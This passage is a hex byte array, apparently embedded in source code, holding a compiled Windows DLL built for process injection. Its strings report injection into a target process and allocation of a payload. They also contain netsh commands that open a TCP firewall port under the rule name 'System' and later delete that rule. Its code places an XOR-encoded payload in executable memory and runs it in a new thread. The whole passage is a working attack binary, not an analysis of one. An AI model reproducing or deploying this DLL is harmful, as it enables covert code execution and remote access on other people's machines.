x4f,0x53,0x20,\r\n0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x11,0xcb,0xaf,0x83,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0,\r\n0x72,0x6c,0xba,0xd0,0x52,0xaa,0xc1,0xd0,0x55,0xaa,0xc0,0xd0,0x4c,0xaa,0xc1,0xd0,\r\n0x5c,0xd2,0x45,0xd0,0x51,0xaa,0xc1,0xd0,0x5c,0xd2,0x53,0xd0,0x54,0xaa,0xc1,0xd0,\r\n0x5c,0xd2,0x50,0xd0,0x54,0xaa,0xc1,0xd0,0x52,0x69,0x63,0x68,0x55,0xaa,0xc1,0xd0,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x50,0x45,0x00,0x00,0x4c,0x01,0x04,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0xe0,0x00,0x02,0x21,0x0b,0x01,0x09,0x00,0x00,0x06,0x00,0x00,\r\n0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x12,0x00,0x00,0x00,0x10,0x00,0x00,\r\n0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,\r\n0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x50,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x40,0x05,\r\n0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x60,0x26,0x00,0x00,0x4e,0x00,0x00,0x00,\r\n0xd8,0x23,0x00,0x00,0x50,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x40,0x00,0x00,0xc8,0x00,0x00,0x00,0x70,0x20,0x00,0x00,0x1c,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x70,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00,\r\n0x76,0x05,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x04,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60,\r\n0x2e,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0x11,0x07,0x00,0x00,0x00,0x20,0x00,0x00,\r\n0x00,0x08,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2e,0x64,0x61,0x74,0x61,0x00,0x00,0x00,\r\n0x2b,0x01,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x12,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xc0,\r\n0x2e,0x72,0x65,0x6c,0x6f,0x63,0x00,0x00,0xde,0x00,0x00,0x00,0x00,0x40,0x00,0x00,\r\n0x00,0x02,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0xff,0x54,0x24,0x04,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x81,0xec,0x1c,0x01,0x00,0x00,0x56,0x57,0xc7,0x85,0xe8,0xfe,0xff,\r\n0xff,0x00,0x00,0x00,0x00,0xff,0x15,0x24,0x20,0x00,0x10,0x50,0xff,0x15,0x20,0x20,\r\n0x00,0x10,0x50,0x68,0x8c,0x20,0x00,0x10,0x6a,0x16,0x68,0xb0,0x20,0x00,0x10,0xe8,\r\n0x7c,0x03,0x00,0x00,0x83,0xc4,0x14,0x68,0x5c,0x11,0x00,0x00,0x68,0xc0,0x20,0x00,\r\n0x10,0x6a,0x1a,0x68,0xf8,0x20,0x00,0x10,0xe8,0x63,0x03,0x00,0x00,0x83,0xc4,0x10,\r\n0x68,0x5c,0x11,0x00,0x00,0x68,0x08,0x21,0x00,0x10,0x8d,0x85,0xf0,0xfe,0xff,0xff,\r\n0x50,0xff,0x15,0x64,0x20,0x00,0x10,0x83,0xc4,0x0c,0x6a,0x00,0x8d,0x8d,0xf0,0xfe,\r\n0xff,0xff,0x51,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b,\r\n0x95,0xec,0xfe,0xff,0xff,0x52,0x68,0x40,0x21,0x00,0x10,0x6a,0x21,0x68,0x64,0x21,\r\n0x00,0x10,0xe8,0x19,0x03,0x00,0x00,0x83,0xc4,0x10,0x6a,0x40,0x68,0x00,0x30,0x00,\r\n0x00,0x68,0x2b,0x01,0x00,0x00,0x6a,0x00,0xff,0x15,0x18,0x20,0x00,0x10,0x89,0x45,\r\n0xfc,0x83,0x7d,0xfc,0x00,0x0f,0x84,0xa1,0x00,0x00,0x00,0x8b,0x45,0xfc,0x50,0x68,\r\n0x2b,0x01,0x00,0x00,0x68,0x74,0x21,0x00,0x10,0x6a,0x28,0x68,0xac,0x21,0x00,0x10,\r\n0xe8,0xdb,0x02,0x00,0x00,0x83,0xc4,0x14,0xb9,0x4a,0x00,0x00,0x00,0xbe,0x00,0x30,\r\n0x00,0x10,0x8b,0x7d,0xfc,0xf3,0xa5,0x66,0xa5,0xa4,0x6a,0x00,0x6a,0x00,0x8b,0x4d,\r\n0xfc,0x51,0x68,0x00,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00,\r\n0x10,0x89,0x85,0xe4,0xfe,0xff,0xff,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x00,0x74,0x1e,\r\n0x6a,0xff,0x8b,0x95,0xe4,0xfe,0xff,0xff,0x52,0xff,0x15,0x10,0x20,0x00,0x10,0x8b,\r\n0x85,0xe4,0xfe,0xff,0xff,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15,\r\n0x08,0x20,0x00,0x10,0x50,0x68,0xbc,0x21,0x00,0x10,0x6a,0x38,0x68,0xd8,0x21,0x00,\r\n0x10,0xe8,0x6a,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x00,0x80,0x00,0x00,0x6a,0x00,\r\n0x8b,0x4d,0xfc,0x51,0xff,0x15,0x30,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15,0x08,0x20,\r\n0x00,0x10,0x50,0x68,0xe8,0x21,0x00,0x10,0x6a,0x3f,0x68,0x04,0x22,0x00,0x10,0xe8,\r\n0x3c,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x14,0x22,0x00,0x10,0x6a,0x43,0x68,0x40,\r\n0x22,0x00,0x10,0xe8,0x28,0x02,0x00,0x00,0x83,0xc4,0x0c,0x6a,0x00,0x68,0x50,0x22,\r\n0x00,0x10,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b,0x95,\r\n0xec,0xfe,0xff,0xff,0x52,0x68,0x90,0x22,0x00,0x10,0x6a,0x45,0x68,0xb4,0x22,0x00,\r\n0x10,0xe8,0xfa,0x01,0x00,0x00,0x83,0xc4,0x10,0x68,0xc4,0x22,0x00,0x10,0x6a,0x47,\r\n0x68,0xd8,0x22,0x00,0x10,0xe8,0xe6,0x01,0x00,0x00,0x83,0xc4,0x0c,0xff,0xb5,0xe8,\r\n0xfe,0xff,0xff,0x68,0x00,0x80,0x00,0x00,0x6a,0x00,0xff,0x75,0x08,0xff,0x35,0x5c,\r\n0x20,0x00,0x10,0xa1,0x30,0x20,0x00,0x10,0xff,0xe0,0x8b,0x85,0xe8,0xfe,0xff,0xff,\r\n0x5f,0x5e,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x56,0x8b,0x74,0x24,0x08,0x57,0x8b,0x7c,0x24,0x14,0x33,0xc0,0x85,0xff,0x76,0x08,\r\n0x88,0x04,0x30,0x40,0x3b,0xc7,0x72,0xf8,0x33,0xc0,0x85,0xff,0x76,0x13,0x8a,0x4c,\r\n0x24,0x10,0x8a,0x14,0x30,0x32,0xd0,0x02,0xd1,0x88,0x14,0x30,0x40,0x3b,0xc7,0x72,\r\n0xf1,0x5f,0x5e,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x8b,0x44,0x24,0x08,0x81,0xec,0x10,0x02,0x00,0x00,0x83,0xe8,0x01,0x0f,0x85,0xe4,\r\n0x00,0x00,0x00,0x56,0x57,0x68,0x04,0x01,0x00,0x00,0x8d,0x84,0x24,0x18,0x01,0x00,\r\n0x00,0x50,0x6a,0x00,0xc7,0x44,0x24,0x18,0x04,0x01,0x00,0x00,0xff,0x15,0x58,0x20,\r\n0x00,0x10,0x50,0xff,0x15,0x2c,0x20,0x00,0x10,0x8d,0x4c,0x24,0x0c,0x51,0x8d,0x54,\r\n0x24,0x14,0x52,0xff,0x15,0x00,0x20,0x00,0x10,0x8d,0x44,0x24,0x10,0x50,0xff,0x15,\r\n0x20,0x20,0x00,0x10,0x50,0x8d,0x8c,0x24,0x1c,0x01,0x00,0x00,0x51,0x68,0xe8,0x22,\r\n0x00,0x10,0x6a,0x7e,0x68,0x28,0x23,0x00,0x10,0xe8,0x02,0x01,0x00,0x00,0x8b,0xbc,\r\n0x24,0x34,0x02,0x00,0x00,0x8b,0x77,0x3c,0x83,0xc4,0x18,0x8d,0x54,0x24,0x08,0x52,\r\n0x03,0xf7,0xc7,0x44,0x24,0x0c,0x00,0x00,0x00,0x00,0x8b,0x46,0x54,0x6a,0x04,0x50,\r\n0x57,0xff,0x15,0x28,0x20,0x00,0x10,0x85,0xc0,0x74,0x0f,0x8b,0x4e,0x54,0x51,0x6a,\r\n0x00,0x57,0xe8,0x19,0xff,0xff,0xff,0x83,0xc4,0x0c,0x6a,0x00,0x6a,0x00,0x57,0x68,\r\n0x10,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00,0x10,0x5f,0x5e,\r\n0x85,0xc0,0x74,0x15,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xb8,0x01,0x00,0x00,0x00,\r\n0x81,0xc4,0x10,0x02,0x00,0x00,0xc2,0x0c,0x00,0xff,0x15,0x08,0x20,0x00,0x10,0x50,\r\n0x68,0x38,0x23,0x00,0x10,0x68,0x94,0x00,0x00,0x00,0x68,0x54,0x23,0x00,0x10,0xe8,\r\n0x7c,0x00,0x00,0x00,0x83,0xc4,0x10,0xb8,0x01,0x00,0x00,0x00,0x81,0xc4,0x10,0x02,\r\n0x00,0x00,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x6a,0x40,0x68,0x64,0x23,0x00,0x10,0x68,0x6c,0x23,0x00,0x10,0x6a,0x00,0xff,0x15,\r\n0x68,0x20,0x00,0x10,0x6a,0x00,0xff,0x15,0x34,0x20,0x00,0x10,0xcc,0xcc,0xcc,0xcc,\r\n0x53,0x8b,0x1d,0x38,0x20,0x00,0x10,0x55,0x56,0x57,0x8b,0x7c,0x24,0x14,0x57,0x8b,\r\n0xef,0x33,0xf6,0xff,0xd3,0x85,0xc0,0x7e,0x1e,0x8d,0xa4,0x24,0x00,0x00,0x00,0x00,\r\n0x8a,0x04,0x3e,0x3c,0x5c,0x74,0x04,0x3c,0x2f,0x75,0x04,0x8d,0x6c,0x3e,0x01,0x57,\r\n0x46,0xff,0xd3,0x3b,0xf0,0x7c,0xe9,0x5f,0x5e,0x8b,0xc5,0x5d,0x5b,0xc3,0xcc,0xcc,\r\n0x51,0x56,0x8b,0x35,0x54,0x20,0x00,0x10,0x57,0x68,0x7c,0x23,0x00,0x10,0x68,0x84,\r\n0x23,0x00,0x10,0xff,0xd6,0x8b,0x3d,0x50,0x20,0x00,0x10,0x50,0xff,0xd7,0x89,0x44,\r\n0x24,0x08,0x85,0xc0,0x0f,0x84,0xf1,0x00,0x00,0x00,0x55,0x68,0x90,0x23,0x00,0x10,\r\n0x68,0x9c,0x23,0x00,0x10,0xff,0xd6,0x50,0xff,0xd7,0x8b,0xe8,0x85,0xed,0x0f,0x84,\r\n0xd6,0x00,0x00,0x00,0x68,0xa8,0x23,0x00,0x10,0x68,0xb4,0x23,0x00,0x10,0xff,0xd6,\r\n0x50,0xff,0xd7,0x85,0xc0,0x0f,0x84,0xbf,0x00,0x00,0x00,0x8b,0x54,0x24,0x1c,0x53,\r\n0x8d,0x4c,0x24,0x24,0x51,0x52,0xff,0xd0,0x8b,0x1d,0x4c,0x20,0x00,0x10,0x8b,0xf8,\r\n0x83,0xc4,0x08,0x81,0xc7,0x00,0x01,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf0,\r\n0x85,0xf6,0x0f,0x84,0x91,0x00,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf8,0x85,\r\n0xff,0x75,0x0d,0x56,0xff,0x15,0x48,0x20,0x00,0x10,0x5b,0x5d,0x5f,0x5e,0x59,0xc3,\r\n0x8b,0x4c,0x24,0x20,0x8d,0x44,0x24,0x24,0x50,0x51,0x56,0xff,0xd5,0x8b,0x54,0x24,\r\n0x28,0x8b,0x44,0x24,0x24,0x83,0xc4,0x0c,0x56,0x52,0x50,0xe8,0x00,0xff,0xff,0xff,\r\n0x83,0xc4,0x04,0x50,0xff,0x15,0x20,0x20,0x00,0x10,0x50,0x68,0xc0,0x23,0x00,0x10,\r\n0x57,0xff,0x54,0x24,0x28,0x83,0xc4,0x18,0x57,0xff,0x15,0x44,0x20,0x00,0x10,0x6a,\r\n0xf5,0xff,0x15,0x40,0x20,0x00,0x10,0x8b,0xd8,0x83,0xfb,0xff,0x74,0x1f,0x6a,0x00,\r\n0x8d,0x4c,0x24,0x14,0x51,0x56,0xc7,0x44,0x24,0x1c,0x00,0x00,0x00,0x00,0xff,0x15,\r\n0x38,0x20,0x00,0x10,0x50,0x56,0x53,0xff,0x15,0x3c,0x20,0x00,0x10,0x57,0x8b,0x3d,\r\n0x48,0x20,0x00,0x10,0xff,0xd7,0x56,0xff,0xd7,0x5b,0x5d,0x5f,0x5e,0x59,0xc3,0xcc,\r\n0xff,0x25,0x5c,0x20,0x00,0x10,0xff,0x25,0x30,0x20,0x00,0x10,0xff,0x25,0x08,0x20,\r\n0x00,0x10,0xff,0x25,0x0c,0x20,0x00,0x10,0xff,0x25,0x10,0x20,0x00,0x10,0xff,0x25,\r\n0x14,0x20,0x00,0x10,0xff,0x25,0x18,0x20,0x00,0x10,0xff,0x25,0x1c,0x20,0x00,0x10,\r\n0xff,0x25,0x20,0x20,0x00,0x10,0xff,0x25,0x24,0x20,0x00,0x10,0xff,0x25,0x28,0x20,\r\n0x00,0x10,0xff,0x25,0x2c,0x20,0x00,0x10,0xff,0x25,0x58,0x20,0x00,0x10,0xff,0x25,\r\n0x34,0x20,0x00,0x10,0xff,0x25,0x38,0x20,0x00,0x10,0xff,0x25,0x3c,0x20,0x00,0x10,\r\n0xff,0x25,0x40,0x20,0x00,0x10,0xff,0x25,0x44,0x20,0x00,0x10,0xff,0x25,0x48,0x20,\r\n0x00,0x10,0xff,0x25,0x4c,0x20,0x00,0x10,0xff,0x25,0x50,0x20,0x00,0x10,0xff,0x25,\r\n0x54,0x20,0x00,0x10,0xff,0x25,0x64,0x20,0x00,0x10,0xff,0x25,0x68,0x20,0x00,0x10,\r\n0xff,0x25,0x00,0x20,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00,\r\n0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00,0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00,\r\n0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00,0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00,\r\n0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00,0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00,\r\n0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00,0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00,\r\n0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00,0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00,0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,\r\n0x61,0x00,0x00,0x00,0xb0,0x26,0x00,0x00,0xb0,0x10,0x00,0x00,0x4d,0x61,0x69,0x6e,\r\n0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x54,0x68,0x72,0x65,0x61,0x64,\r\n0x20,0x25,0x78,0x3a,0x25,0x78,0x20,0x73,0x74,0x61,0x72,0x74,0x65,0x64,0x0a,0x00,\r\n0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,\r\n0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x41,0x64,\r\n0x64,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x72,0x75,\r\n0x6c,0x65,0x20,0x66,0x6f,0x72,0x20,0x54,0x43,0x50,0x20,0x70,0x6f,0x72,0x74,0x20,\r\n0x25,0x64,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20,\r\n0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,\r\n0x6c,0x20,0x61,0x64,0x64,0x20,0x70,0x6f,0x72,0x74,0x6f,0x70,0x65,0x6e,0x69,0x6e,\r\n0x67,0x20,0x54,0x43,0x50,0x20,0x25,0x64,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x00,\r\n0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f,\r\n0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25,\r\n0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,\r\n0x3a,0x20,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20,0x25,0x64,0x20,0x62,\r\n0x79,0x74,0x65,0x73,0x20,0x66,0x6f,0x72,0x20,0x70,0x61,0x79,0x6c,0x6f,0x61,0x64,\r\n0x20,0x61,0x74,0x20,0x30,0x78,0x25,0x78,0x0a,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,\r\n0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61,\r\n0x74,0x65,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,\r\n0x20,0x25,0x64,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x41,\r\n0x6c,0x6c,0x6f,0x63,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a,\r\n0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,\r\n0x3a,0x20,0x44,0x65,0x6c,0x65,0x74,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77,\r\n0x61,0x6c,0x6c,0x20,0x72,0x75,0x6c,0x65,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x00,0x00,\r\n0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,\r\n0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20,0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68,\r\n0x20,0x61,0x64,0x76,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x66,0x69,0x72,\r\n0x65,0x77,0x61,0x6c,0x6c,0x20,0x64,0x65,0x6c,0x65,0x74,0x65,0x20,0x72,0x75,0x6c,\r\n0x65,0x20,0x6e,0x61,0x6d,0x65,0x3d,0x53,0x79,0x73,0x74,0x65,0x6d,0x00,0x00,0x00,\r\n0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f,\r\n0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25,\r\n0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,\r\n0x3a,0x20,0x45,0x58,0x49,0x54,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x44,0x6c,0x6c,0x4d,0x61,0x69,0x6e,0x28,\r\n0x29,0x3a,0x20,0x49,0x6e,0x6a,0x65,0x63,0x74,0x65,0x64,0x20,0x69,0x6e,0x74,0x6f,\r\n0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,0x22,0x25,0x73,0x22,0x20,0x28,0x50,\r\n0x49,0x44,0x3d,0x25,0x64,0x29,0x2c,0x20,0x55,0x73,0x65,0x72,0x20,0x3d,0x20,0x22,\r\n0x25,0x73,0x22,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x54,0x68,\r\n0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a,\r\n0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x44,0x75,0x6d,0x6d,0x79,0x28,0x29,0x00,0x3c,0x4f,0x4b,0x3e,\r\n0x20,0x74,0x6f,0x20,0x65,0x78,0x69,0x74,0x2e,0x2e,0x2e,0x00,0x73,0x70,0x72,0x69,\r\n0x6e,0x74,0x66,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,\r\n0x76,0x73,0x70,0x72,0x69,0x6e,0